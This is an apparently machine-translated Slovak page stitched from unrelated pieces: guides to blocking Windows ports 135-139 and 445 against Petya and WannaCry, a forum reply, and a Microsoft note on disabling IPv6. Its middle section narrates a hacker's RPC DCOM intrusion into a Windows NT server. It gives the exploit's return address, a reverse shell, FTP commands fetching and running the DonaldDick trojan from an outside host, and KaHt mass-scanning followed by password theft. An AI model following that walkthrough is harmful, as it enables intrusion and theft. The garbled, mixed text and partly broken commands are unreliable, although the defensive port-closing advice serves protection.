Včera neznámi ľudia zorganizovali ďalší masívny útok pomocou ransomvérového vírusu. Experti uviedli, že postihnuté boli desiatky veľkých spoločností na Ukrajine a v Rusku. Ransomvér sa volá Petya.A (vírus je pravdepodobne pomenovaný po Petrovi Porošenkovi). Píšu, že ak vytvoríte súbor perfc (bez prípony) a umiestnite ho na C:\Windows\, vírus vás obíde. Ak sa počítač reštartoval a začal "kontrolovať disk", musíte ho okamžite vypnúť. Zavedenie z LiveCD alebo USB vám umožní prístup k súborom. Ďalším spôsobom, ako sa chrániť, je zatvorenie portov 1024-1035, 135 a 445. Teraz pochopíme, ako to urobiť na príklade systému Windows 10.

Krok 1
Ísť do Brána firewall systému Windows(je lepšie zvoliť režim vylepšeného zabezpečenia), vyberte kartu " Extra možnosti».
Vyberte kartu " Pravidlá pre prichádzajúce spojenia", potom akcia" Vytvoriť pravidlo“ (v pravom stĺpci).

Krok 2
Vyberte typ pravidla - " pre Port". V ďalšom okne vyberte " TCP protokol“, zadajte porty, ktoré chcete zatvoriť. V našom prípade toto 135, 445, 1024-1035 “ (bez úvodzoviek).

Krok 3
Vyberte položku " Blokovať pripojenie“, v nasledujúcom okne označíme všetky profily: Doména, Súkromné, Verejné.

Krok 4
Zostáva vymyslieť názov pravidla (aby sa v budúcnosti dalo ľahko nájsť). Môžete zadať popis pravidla.

Ak niektoré programy prestanú fungovať alebo začnú pracovať nesprávne, možno ste zatvorili port, ktorý používajú. Pre nich budete musieť pridať výnimku vo firewalle.

135 TCP port používané vzdialenými službami (DHCP, DNS, WINS atď.) a v aplikáciách klient-server spoločnosti Microsoft (napr. Exchange).

445 TCP port používaný v Microsoft Windows 2000 a novšie pre priamy TCP/IP prístup bez použitia NetBIOS (napríklad v Active Directory).

Publikácia

Vírus WannaCry, známy aj ako WannaCrypt alebo Wanna Decryptor, zasiahol virtuálny svet v máji 2017. Malvér prenikal do lokálnych sietí, infikoval jeden počítač za druhým, šifroval súbory na diskoch a žiadal, aby používateľ previedol 300 až 600 dolárov vydieračom na ich odomknutie. Podobne pôsobil aj vírus Petya, ktorý si v lete 2017 získal takmer politickú povesť.

Obaja sieťoví škodcovia prenikli do operačného systému počítača obete rovnakými dverami - sieťové porty 445 alebo 139. Po dvoch veľkých vírusoch sa začali využívať menšie typy počítačových infekcií Aké porty kontroluje každý, kto nie je lenivý?

Za čo sú v systéme Windows zodpovedné porty 445 a 139

Tieto porty sa používajú na systém Windows na zdieľanie súborov a tlačiarní. Prvý port je zodpovedný za protokol Server Message Blocks (SMB) a protokol Network Basic Input-Output System (NetBIOS) funguje cez druhý. Oba protokoly umožňujú počítačom pod Ovládanie Windows pripojiť cez sieť k „zdieľaným“ priečinkom a tlačiarňam cez hlavné protokoly TCP a UDP.

Počnúc systémom Windows 2000 sa zdieľanie súborov a tlačiarní cez sieť uskutočňuje primárne cez port 445 pomocou aplikačného protokolu SMB. Protokol NetBIOS sa používal v starších verziách systému, pracoval cez porty 137, 138 a 139 a táto funkcia bola zachovaná vo viacerých neskoršie verzie systémy ako atavizmus.

Prečo sú otvorené porty nebezpečné

445 a 139 je jemná, ale významná zraniteľnosť v systéme Windows. Ak tieto porty necháte nezaistené, otvorí sa vám brána dokorán HDD pre nezvaných hostí, ako sú vírusy, trójske kone, červy, ako aj pre hackerské útoky. A ak je váš počítač zapnutý lokálna sieť, potom sú všetci jeho používatelia vystavení riziku infekcie škodlivým softvérom.

V skutočnosti zdieľate svoj pevný disk s kýmkoľvek, kto má prístup k týmto portom. V prípade potreby a zručnosti si útočníci môžu obsah zobraziť pevný disk, alebo dokonca vymazať dáta, naformátovať samotný disk alebo zašifrovať súbory. Presne to urobili Vírusy WannaCry a Peťa, ktorých epidémia zachvátila svet toto leto.

Ak vám teda záleží na bezpečnosti vašich údajov, nebude od veci naučiť sa zatvárať porty 139 a 445 vo Windowse.

Zistite, či sú porty otvorené

Vo väčšine prípadov je port 445 otvorený v systéme Windows, pretože funkcie zdieľania tlačiarne a súborov sú automaticky povolené, aj keď Inštalácia systému Windows. Dá sa to jednoducho skontrolovať na vašom stroji. Stlačte klávesovú skratku Win+R aby ste otvorili okno rýchly obed. V ňom zadajte cmd" na spustenie príkazového riadku. Do príkazového riadku napíšte " netstat-na“ a stlačte Zadajte. Tento príkaz umožňuje skenovať všetky aktívne sieťové porty a zobraziť údaje o ich stave a aktuálnych prichádzajúcich pripojeniach.

Po niekoľkých sekundách sa zobrazí štatistická tabuľka portov. Úplne hore v tabuľke bude uvedená IP adresa portu 445. Ak je stav v poslednom stĺpci tabuľky "POČÚVANIE", znamená to, že port je otvorený. Podobne aj port 139 nájdete v tabuľke a zistíte jeho stav.

Ako zatvoriť porty v systéme Windows 10/8/7

Existujú tri hlavné spôsoby zatvorenia portu 445 v systéme Windows 10, 7 alebo 8. V závislosti od verzie systému sa navzájom veľmi nelíšia a sú celkom jednoduché. Môžete vyskúšať ktorýkoľvek z nich. Rovnakým spôsobom môžete zatvoriť aj port 139.

Zatvorte porty cez bránu firewall

Prvá metóda, ktorá vám umožňuje zatvoriť port 445 v systéme Windows, je najjednoduchšia a je dostupná takmer každému používateľovi.

  1. Ísť do Štart > Ovládací panel > Brána firewall systému Windows a kliknite na odkaz Extra možnosti.
  2. Kliknite Prichádzajúce pravidlá výnimiek > Nové pravidlo. V zobrazenom okne vyberte Pre Port > Ďalej > Protokol TCP > Definované lokálne porty, do poľa vedľa zadajte 445 a kliknite Ďalej.
  3. Ďalej vyberte Blokovať pripojenie a znova stlačte Ďalej. Znova začiarknite tri políčka Ďalej. Zadajte názov a voliteľne aj popis nového pravidla a kliknite Pripravený.

Teraz bude možnosť prichádzajúceho spojenia na port 445 uzavretá. V prípade potreby je možné vytvoriť podobné pravidlo pre port 139.

Zatvorenie portov cez príkazový riadok

Druhá metóda zahŕňa operácie príkazového riadku a je vhodnejšia pre pokročilých používateľov systému Windows.

  1. Kliknite Štart a do vyhľadávacieho panela v spodnej časti ponuky napíšte „ cmd". V zobrazenom zozname kliknite na kliknite pravým tlačidlom myši myš zapnutá cmd a vyberte si Spustiť ako správca.
  2. Skopírujte príkaz do okna príkazového riadka netsh advfirewall zapol stav všetkých profilov. Kliknite Zadajte.
  3. Potom skopírujte nasledujúci príkaz: netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_TCP-445". Kliknite Zadajte znova.

Tento postup tiež vytvorí pravidlo brány Windows Firewall na zatvorenie portu 445. Niektorí používatelia to však hlásia túto metódu nefunguje na ich počítačoch: keď je zaškrtnuté, port zostáva v stave „NAČÚVANIE“. V tomto prípade by ste mali vyskúšať tretiu metódu, ktorá je tiež celkom jednoduchá.

Zatvorenie portov prostredníctvom registra Windows

Môžete tiež zablokovať pripojenia k portu 445 zmenou systémový register. Túto metódu používajte opatrne: Registry systému Windows je hlavnou databázou celého systému a náhodná chyba môže viesť k nepredvídateľným následkom. Pred prácou s registrom sa odporúča urobiť zálohovanie, napríklad pomocou programu CCleaner.

  1. Kliknite Štart a do vyhľadávacieho panela zadajte "regedit". Kliknite Zadajte.
  2. V strome registra prejdite do nasledujúceho adresára: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters.
  3. Na pravej strane okna sa zobrazí zoznam možností. Kliknite pravým tlačidlom myši na prázdnu oblasť zoznamu a vyberte Vytvorte. Z rozbaľovacej ponuky vyberte Hodnota DWORD (32-bitová) alebo Hodnota DWORD (64-bitová) v závislosti od typu vášho systému (32-bitový alebo 64-bitový).
  4. Premenovať nový parameter v SMBDeviceEnabled a potom naň dvakrát kliknite. V zobrazenom okne Zmena parametra v teréne Význam nahraďte 1 0 a kliknite OK na potvrdenie.

Táto metóda je najúčinnejšia, ak presne dodržiavate vyššie uvedené pokyny. Upozorňujeme, že sa vzťahuje iba na port 445.

Aby bola ochrana efektívnejšia, po vykonaní zmien v registri môžete aj zakázať Služba Windows server. Ak to chcete urobiť, postupujte takto:

  1. Kliknite na tlačidlo Štart a do vyhľadávacieho panela zadajte text "services.msc". Otvorí sa zoznam systémových služieb Windows.
  2. Nájdite službu Server a dvakrát na ňu kliknite. Spravidla sa nachádza niekde v strede zoznamu.
  3. V zobrazenom okne v rozbaľovacom zozname Typ spustenia vyberte Zakázané a stlačte OK.

Vyššie uvedené metódy (s výnimkou tretieho) vám umožňujú zatvoriť nielen port 445, ale aj porty 135, 137, 138, 139. Aby ste to dosiahli, pri vykonávaní postupu jednoducho nahraďte číslo portu tým, ktoré potrebu.

Ak budete neskôr potrebovať otvoriť porty, jednoducho vymažte vytvorené pravidlo Windows firewall alebo zmeňte hodnotu parametra vytvoreného v registri z 0 na 1 a potom službu povoľte späť Windows Server výberom zo zoznamu Typ spustenia význam Automaticky namiesto Zakázané.

Dôležité! Je potrebné mať na pamäti, že port 445 v systéme Windows je zodpovedný za zdieľanie súborov, priečinkov a tlačiarní. Ak teda zatvoríte daný prístav, už nemôžete "zdieľať" zdieľaný priečinok pre iných používateľov alebo vytlačte dokument cez sieť.

Ak je váš počítač pripojený k lokálnej sieti a potrebujete, aby tieto funkcie fungovali, mali by ste použiť bezpečnostné nástroje tretích strán. Napríklad aktivovať POŽARNE DVERE váš antivírus, ktorý prevezme kontrolu nad všetkými portami a bude dohliadať na neoprávnený prístup.

Dodržiavaním vyššie uvedených odporúčaní sa môžete chrániť pred jemnou, ale závažnou zraniteľnosťou v systéme Windows a chrániť svoje údaje pred mnohými typmi škodlivého softvéru, ktorý sa môže dostať do systému cez porty 139 a 445.

Tá zraniteľnosť bola naozaj strašná
hotový exploit sa ukázal ako nedostupný pre
väčšina ľudí... To je asi dôvod
nikto sa nebál...

Skupina poľských odborníkov v tejto oblasti
bezpečnosť počítačová technológia„Posledný
Stage of Delírium „povedal verejnosti o nájdenom
ich zraniteľnosti, manipulujúce s objektmi DCOM
kontext protokolu RPC. To bolo niečo
úžasné, pretože tento protokol
používa takmer každý
aktuálne existujúce verzie systému Windows.
Zraniteľné sa ukázali byť Windows NT, Windows XP, Windows 2000
a dokonca aj Windows Server 2003 bol zameraný. Toto
bolo viac než dosť na prevzatie
počítačov väčšiny používateľov
Internetové siete. Navyše mnohé servery nie sú
blokované prichádzajúce pakety na porte 135,
bol to on, kto bol použitý na útok. Čo
urobili z nich potenciálne obete.

Ale o niekoľko hodín neskôr Todd Sabin hlási,
že všetky služby RPC sú zraniteľné. to
znamená, že nastavenie brány firewall na
blokovanie portu 135 nestačí
prostriedky ochrany. Nebezpečenstvá vystavené
počítače s otvorenými 135 (UDP/TCP), 139, 445 a 593
prístavov. medializácia daná chyba, ako
potenciálne bezpečnostné riziko
Používatelia systému Windows. Záležitosť sa dostala na svet
katastrofa. Ale keďže verejnosť
žiadny exploit nebol zverejnený, všetci pokračovali
žiť svoj starý život bez premýšľania
dôsledky jeho objavenia sa v masách.

Ale nie všetci reagovali tak pasívne
výskyt tejto zraniteľnosti. hackermi
postupne začal písať súkromne
exploity a deti zo scenárov na to stále čakali
vzhľad. Výsledok na seba nenechal dlho čakať
počkaj. V priebehu niekoľkých dní sa objavia
nejaký vývoj v tejto oblasti,
objavujú sa prvé exploity. Avšak
väčšina z nich len vyprovokuje haváriu
na vzdialenom systéme. Čo sa dá vysvetliť
keďže technické detaily o
zistená zraniteľnosť nebola známa. Hoci
niektoré verzie OS už úspešne
boli zneužité.

Tento deň bol prelomový v histórii.
zneužívanie tejto zraniteľnosti. Konečne
zobrazí sa technický popis Problémy.
Po ktorých sa rodí veľké množstvo
exploity pre rôzne verzie systému Windows.
Niektoré z nich majú aj grafiku
rozhranie a niekedy aj funkcia skenovania
špecifický rozsah IP adries.

Práve v tomto momente masívne
útok hackerov na bežných používateľov.
Okrem toho sa objavil internetový červ MS Blast,
ktoré ľahko prenikli do počítačov
pripojený k internetu a dokonca
firemné siete najväčších spoločností
mier. Všetci sú v nebezpečenstve...

Útok na vzdialený stroj neznamená
špeciálna práca. Tak sa ujali scenáristi
tvoja vec. Krádeže kreditných kariet a súkromných
exploitov sa niekoľkonásobne zvýšil. A
mnoho chutných segmentov siete sa stalo
ochutnaj to. To je to, čo urobil
jeden hacker. Chcel prevziať server na dlhú dobu,
ale pred tým slušná zraniteľnosť pod tým
nemal. Nezneužívajte to
jednoducho nemohol byť darom osudu.

Hra v troch dejstvách

Prvá vec, ktorú musel urobiť predtým
útok, je skontrolovať, ktorý z nich
nainštalovaný operačný systém
server. Na to použil
pomôcka nmap. Hacker o nej opakovane písal
možnosti, ale budem sa opakovať a poviem to
používa sa na určenie verzie OS
na vzdialený počítač. Dobre, že ona
existuje pre Windows aj *nix. ALE
ako hacker za svoju prácu
používal Windows, potom jeho voľba padla na
grafická verzia nmap.

Niekoľko minút prevádzky skenera a
výsledok je pozitívny. 135 port sa ukázal byť
otvorené a nie sú chránené firewallom. to
bol začiatok konca, začiatok dlho očakávaného
útokov. V tomto bode to už bolo napísané
mnoho exploitov, vrátane "RCP Exploit GUI #2".
Jeho charakteristickým znakom bolo, že on
mal grafické rozhranie a obsahoval v
vlastné vstavané funkcie skenovania
IP rozsah, ako aj FTP server.

Po spustení exploitu ukázal adresu
cieľový počítač. Ale v zozname OS pre
napadol Počítače so systémom Windows NT nebolo špecifikované. ale
bol nainštalovaný na serveri. to
vážny problém, pretože
ak chcete spustiť exploit, musíte ho poznať
presnú adresu v pamäti a potom preniesť
kontrolu nad ním. Trochu rýpanie do
súbory stiahnuté pomocou exploitu, it
našiel malý zoznam adries pod širokým
rozmanitosť Linka Windows. Medzi nimi
bol prítomný a predinštalovaný Windows NT
Service Pack 4. Bol to jeho význam, ktorý naznačil v
ako spiatočnú adresu pľuvaním na príručku
Výber OS. Číslo 0xE527F377 sa stalo jeho tajomstvom
prechod do života servera. A začal útočiť.

Systém sa vzdal bez akýchkoľvek
hacker dostal reverzný shell
s vzdialený server. Teraz, keď mohol
urobte na ňom čokoľvek, už to prišlo
čas na inštaláciu Trojana. Medzi veľkými
počet možných, bol vybraný DonaldDick. Pre
musel uskutočniť svoj plán
získať hosting bezplatný server s
podpora FTP. BY.RU sedí perfektne, presne
tam nahral server pre trójskeho koňa. teraz
keď bol DonaldDick dostupný cez FTP, on
sa obete ujal, či skôr začal nahrávať
Trójsky server na ňom. Bolo to dobré
dobre premyslený plán, pretože zraniteľnosť
mohol byť opravený a trójsky kôň je tiež v Afrike
trójsky kôň. Zadaním do ftp konzoly začal
Nahrajte súbor. Celý proces mu trval
napíš len päť riadkov:

otvoriť by.ru
názov_servera.by.ru
heslo
získať súbor fooware.exe
zbohom

Kde fooware.exe je premenovaný server
Donald Dick. Keď sa súbor stiahne, má
stačí spustiť. Za to jednoducho
napísal názov súboru (fooware.exe) a užíval si
stlačil Enter ... Po ktorom hacker dostal pohodlné
kontrolu nad serverom.

Ale viete, ako je to vždy, keď
nájsť niečo zaujímavé pokračujte
hrať to. Takže náš Hacker chcel
získať viac ako jeden systém. Po pohľade
že exploit umožňuje masívne
skenovanie, pustil sa do práce, resp
KaHt prevzal prácu. Jeho použitie
sa ukázalo, že to nie je ťažké. Tak napríklad do
o skenovaní siete s IP 192.168.0.* (trieda C), it
museli ste zadať „KaHt.exe 129.168.0.1
192.168.0.254". Čo v skutočnosti urobil,
potom pravidelne kontrolujte
výsledky. Tak získal prístup
ešte viac používateľom, od
ku ktorým sa mu potom podarilo získať heslá
rôzne služby, pošta a oveľa viac
užitočná informácia. Nehovoriac o,
že mnohé z nich začal používať ako
anonymné proxy.

Potrava na zamyslenie

Hoci Microsoft vydal opravu už dávno,
používatelia a správcovia sa nikam neponáhľajú
inštalovať záplaty v nádeji, že ich sieť nie
nikoho to nebude zaujímať. Ale takí hackeri
veľký počet a inštalácia opravy je
skôr nutnosťou ako možnosťou.
Môžete tiež zablokovať všetky prichádzajúce pakety
na portoch 135, 139, 445 a 593.

Prirodzene, hacker to všetko urobil
anonymný proxy a v dôsledku toho vyčistený
za stopou prítomnosti v systéme. Ale ty
pred opakovaním by ste sa mali zamyslieť
jeho skutky. Koniec koncov, takéto akcie sú zvažované
nezákonné a môže mať za následok
si dosť žalostný...

Krv, skutočnosť, že váš firewall ukazuje, že svchost.exe počúva tento port, neznamená, že je otvorený pre pripojenie zvonku.

Zdá sa, že pravidlá sú napísané a mali by fungovať.

Skúšali ste skenery portov? - TsOB (Centrum pre poskytovanie zabezpečenia) (odsek 2.7)

A nezabudnite, že IPv6 bude stále potrebné skontrolovať, pretože. vo vašom systéme je povolená, ale skenery zvyčajne kontrolujú iba IPv4 (hovorím o centralizovaných službách).

Ak tento protokol vôbec nepotrebujete, môžete ho vypnúť:

Ak chcete vypnúť komponenty IP verzie 6 v Windows Vista, postupujte podľa nižšie uvedených krokov.

1. Kliknite na tlačidlo Štart, do poľa Začať vyhľadávanie napíšte regedit a potom vyberte zo zoznamu Programy regedit.exe.

2. V dialógovom okne Kontrola používateľských kont kliknite na Pokračovať.

3. Nájdite a vyberte nasledujúci podkľúč databázy Registry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\

4. Dvakrát kliknite na DisabledComponents, aby ste zmenili nastavenie DisabledComponents.

Poznámka. Ak parameter DisabledComponents nie je dostupný, je potrebné ho vytvoriť. Postupujte podľa nižšie uvedených krokov.

1. V ponuke Úpravy vyberte položku Nový a potom Hodnota DWORD (32-bit).

2. Napíšte DisabledComponents a stlačte ENTER.

3. Dvakrát kliknite na DisabledComponents.

5. Zadajte ľubovoľnú z nasledujúcich hodnôt na konfiguráciu IP verzie 6 a potom kliknite na OK.

1. Zadajte 0, aby ste povolili všetky komponenty IP verzie 6.

Poznámka. Štandardne sa používa hodnota "0".

2. Zadajte 0xffffffff, aby ste deaktivovali všetky komponenty IP verzie 6 okrem rozhrania spätnej slučky. S touto hodnotou bude systém Windows Vista tiež používať IP verziu 4 v politikách prefixov namiesto IPv6.

3. Ak chcete použiť predponu IP verzie 4 v politikách namiesto IP verzie 6, zadajte 0x20.

4. Zadajte 0x10, aby ste zakázali natívne rozhrania IP verzie 6.

5. Zadajte 0x01, aby ste zakázali všetky rozhrania tunela IP verzie 6.

6. Zadajte 0x11, aby ste zakázali všetky rozhrania IP verzie 6 okrem rozhrania spätnej slučky.

Poznámky

* Použitie iných hodnôt ako 0x0 alebo 0x20 môže spôsobiť zlyhanie služby Smerovanie a vzdialený prístup.

* Aby sa zmeny prejavili, musíte reštartovať počítač.

Informácie v tomto článku sa vzťahujú na nasledujúce produkty.

* Windows Vista Enterprise

*Windows Vista Enterprise 64-bitové vydanie

* Windows Vista Home Basic 64-bitové vydanie

*Windows Vista Home Premium 64-bitové vydanie

*Windows Vista Ultimate 64-bitové vydanie

* Windows Vista Business

* Windows Vista Business 64-bitové vydanie

*Windows Vista Home Basic

*Windows Vista Home Premium

*Windows Vista Starter

* Windows Vista Ultimate

* Windows 7 Enterprise

*Windows 7 Home Basic

* Windows 7 Home Premium

* Windows 7 Professional

* Windows 7 Ultimate

*Dátové centrum Windows Server 2008 R2

* Windows Server 2008 R2 Enterprise

* Windows Server 2008 R2 Standard

*Dátové centrum Windows Server 2008

*Windows Server 2008 Enterprise

* Windows Server 2008 Standard

Zdroj - http://support.microsoft.com/kb/929852

Po odpojení a reštarte máte zo zoznamu prijatého príkazom ipconfig /all hromada riadkov navyše zmizne a zostanú len rozhrania, ktoré dobre poznáte.

Spätné zahrnutie sa vykoná jednoduchým odstránením vytvoreného kľúča z registra alebo nahradením hodnoty "0" a následným reštartom.

Každý deň sa majitelia počítačov stretávajú s obrovské množstvo nebezpečné programy a vírusy, ktoré sa tak či onak dostanú na pevný disk a spôsobia únik dôležitých dát, poruchu počítača, krádež dôležitá informácia a iné nepríjemné situácie.

Najčastejšie sú infikované počítače so systémom Windows akejkoľvek verzie, či už ide o 7, 8, 10 alebo akúkoľvek inú. hlavný dôvod takouto štatistikou sú prichádzajúce pripojenia k PC alebo „porty“, ktoré sú slabou stránkou každého systému vzhľadom na ich štandardnú dostupnosť.

Slovo "port" je termín, ktorý znamená sériové číslo prichádzajúce pripojenia, ktoré sú nasmerované do vášho počítača z externého softvéru. Často sa stáva, že tieto porty používajú vírusy, ktoré ľahko preniknú do vášho počítača pomocou IP siete.

Vírusové softvér, akonáhle sa dostane do počítača cez takéto prichádzajúce spojenia, rýchlo infikuje všetky dôležité súbory, nielen používateľské, ale aj systémové. Aby ste tomu zabránili, odporúčame vám zatvoriť všetky štandardné porty, ktoré sa môžu stať vaším zraniteľným miestom pri napadnutí hackermi.

Ktoré porty sú v systéme Windows 7-10 najzraniteľnejšie?

Početné štúdie a prieskumy odborníkov ukazujú, že až 80 % škodlivých útokov a hacknutí sa vyskytlo pomocou štyroch hlavných portov používaných na rýchlu výmenu súborov medzi rôzne verzie Windows:

  • Vyžaduje sa port TCP 139 vzdialené pripojenie a ovládanie PC;
  • TCP port 135, určený na vykonávanie príkazov;
  • TCP port 445 pre rýchly prenos súborov;
  • UDP port 137, cez ktorý sa vykonáva rýchle vyhľadávanie na PC.

Zatvorte porty 135-139 a 445 v systéme Windows

Pozývame vás, aby ste sa zoznámili s najviac jednoduchými spôsobmi Uzavretie portov Windows, ktoré nevyžadujú ďalšie znalosti a odborné zručnosti.

Pomocou príkazového riadku

Príkaz Reťazec systému Windows- ide o softvérový shell, ktorý slúži na nastavenie určitých funkcií a parametrov pre softvér, ktorý nemá vlastný grafický shell.

S cieľom bežať príkazový riadok, potrebné:

  1. Súčasne stlačte kombináciu klávesov Win + R
  2. V zobrazenom príkazovom riadku zadajte cmd
  3. Kliknite na tlačidlo "OK".

objaví sa pracovné okno s čiernym pozadím, do ktorého je potrebné postupne zadávať nasledujúce príkazy. Po každom zadanom riadku potvrďte akciu stlačením klávesu Enter.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name="Block1_TCP-135"(príkaz na zatvorenie portu 135)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name="Block1_TCP-137"(príkaz na zatvorenie portu 137)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name="Block1_TCP-138"(príkaz na zatvorenie portu 138)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name="Block_TCP-139"(príkaz na zatvorenie portu 139)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name="Block_TCP-445"(príkaz na zatvorenie portu 445)
netsh advfirewall firewall pridať pravidlo dir=v akcii=blokovať protokol=tcp localport=5000 name="Block_TCP-5000"

Šesť príkazov, ktoré sme uviedli, je potrebných na: zatvorenie 4 zraniteľných portov TCP systému Windows (štandardne otvorené), zatvorenie portu UDP 138 a zatvorenie portu 5000, ktorý je zodpovedný za zobrazenie zoznamu dostupných služieb.

Porty zatvárame pomocou programov tretích strán

Ak nechcete tráviť čas prácou s príkazovým riadkom, odporúčame vám, aby ste sa s ním oboznámili aplikácie tretích strán. Podstatou takéhoto softvéru je úprava registra v automatický režim s GUI, bez nutnosti manuálneho zadávania príkazov.

Podľa našich používateľov najviac populárny program pre tieto účely je Windows Doors Cleaner. Pomôže vám jednoducho zatvoriť porty na počítači so systémom Windows 7/8/8.1/10. Staršie verzie operačné systémy bohužiaľ nepodporované.

Ako pracovať s programom, ktorý zatvára porty

Ak chcete použiť Windows Doors Cleaner, musíte:

1. Stiahnite si softvér a nainštalujte ho
2. Spustite program kliknutím pravým tlačidlom myši na odkaz a výberom možnosti „spustiť ako správca“
3. V pracovnom okne, ktoré sa zobrazí, bude zoznam portov a tlačidlá „Zavrieť“ alebo „Zakázať“, ktoré zatvárajú zraniteľné porty systému Windows, ako aj všetky ostatné, ktoré chcete
4. Po vykonaní potrebných zmien musíte reštartovať systém

Ďalšou výhodou programu je skutočnosť, že s jeho pomocou môžete porty nielen zatvárať, ale aj otvárať.

Vyvodzovanie záverov

Zatvorenie zraniteľných sieťových portov v systéme Windows nie je všeliekom na všetky neduhy. Je dôležité mať na pamäti, že bezpečnosť siete možno dosiahnuť iba komplexnými opatreniami zameranými na odstránenie všetkých zraniteľností vášho počítača.

Pre bezpečnosť Používateľ systému Windows je povinné inštalovať dôležité aktualizácie od spoločnosti Microsoft, mať licencovaný antivírusový softvér a povolenú bránu firewall, používať iba bezpečný softvér a pravidelne čítať naše články, v ktorých hovoríme o všetkých existujúce metódy dosiahnuť anonymitu a bezpečnosť vašich údajov.

Poznáte lepšie spôsoby zatvorenia sieťových portov? Podeľte sa o svoje poznatky v komentároch a nezabudnite článok znova uverejniť na svojej stránke. zdieľam užitočná informácia so svojimi priateľmi a nedávajte hackerom šancu ublížiť vašim blízkym!